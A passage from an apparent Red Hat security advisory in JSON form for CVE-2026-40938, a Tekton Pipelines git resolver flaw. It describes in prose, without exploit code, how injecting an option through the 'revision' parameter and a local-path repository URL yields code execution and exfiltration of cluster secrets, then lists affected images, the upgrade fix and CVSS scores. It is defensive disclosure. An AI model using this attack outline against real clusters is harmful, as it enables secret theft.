"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2460292"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Tekton Pipelines, a system for declaring continuous integration/continuous delivery (CI/CD) pipelines. An authenticated user, able to submit `ResolutionRequest` objects, can exploit a vulnerability by injecting malicious commands into the git resolver\u0027s revision parameter. This allows for the execution of unauthorized programs on the resolver pod. Successful exploitation can lead to the exfiltration of all cluster-wide secrets, resulting in significant information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/tektoncd/pipeline: Tekton Pipelines: Arbitrary code execution and secret exfiltration via malicious git commands",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in Tekton Pipelines allows an authenticated user to achieve arbitrary code execution on the resolver pod by injecting malicious commands into the git resolver\u0027s revision parameter. This vulnerability happens because the `revision` parameter is passed as a positional argument to the `git fetch` command without any previous validation whether the parameter\u0027s value doesn\u0027t start with `-` character. Combining this lack of validation with the fact the function which validates the repository URL explicitly allows a repository URL to being with `/`, translating to a local filesystem. An attacker with enough privileges to perform an operation which trigger resolvers to use the `ResolutionRequest` function can \nchain both behaviors to trick Tekton Pipelines to load and execute an arbitrary binary on the resolver pod.\n\nExploring this vulnerability may be considered of a high complexity as an attacker needs to either know an existing valid git repository located at a predicable path already in the resolver pod or a default URL configuration pointing to a local filesystem\u0027s path.\n \nA successful exploitation of the flaw can lead to the exfiltration of all cluster-wide secrets, posing a significant risk to the integrity and confidentiality of the OpenShift environment. Additionally, depending on the data included in the `kubeconfig` files, an attacker may achieve privilege escalation or perform lateral movements within the targeted cluster.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40938"
},
{
"category": "external",
"summary": "RHBZ#2460292",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460292"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40938",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40938"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40938",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40938"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1",
"url": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq",
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq"
}
],
"release_date": "2026-04-21T20:45:24.658000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-14T11:39:27+00:00",
"details": "It is recommended that existing users of Red Hat OpenShift Builds 1.7.z upgrade to 1.8.0",
"product_ids": [
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:17546"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
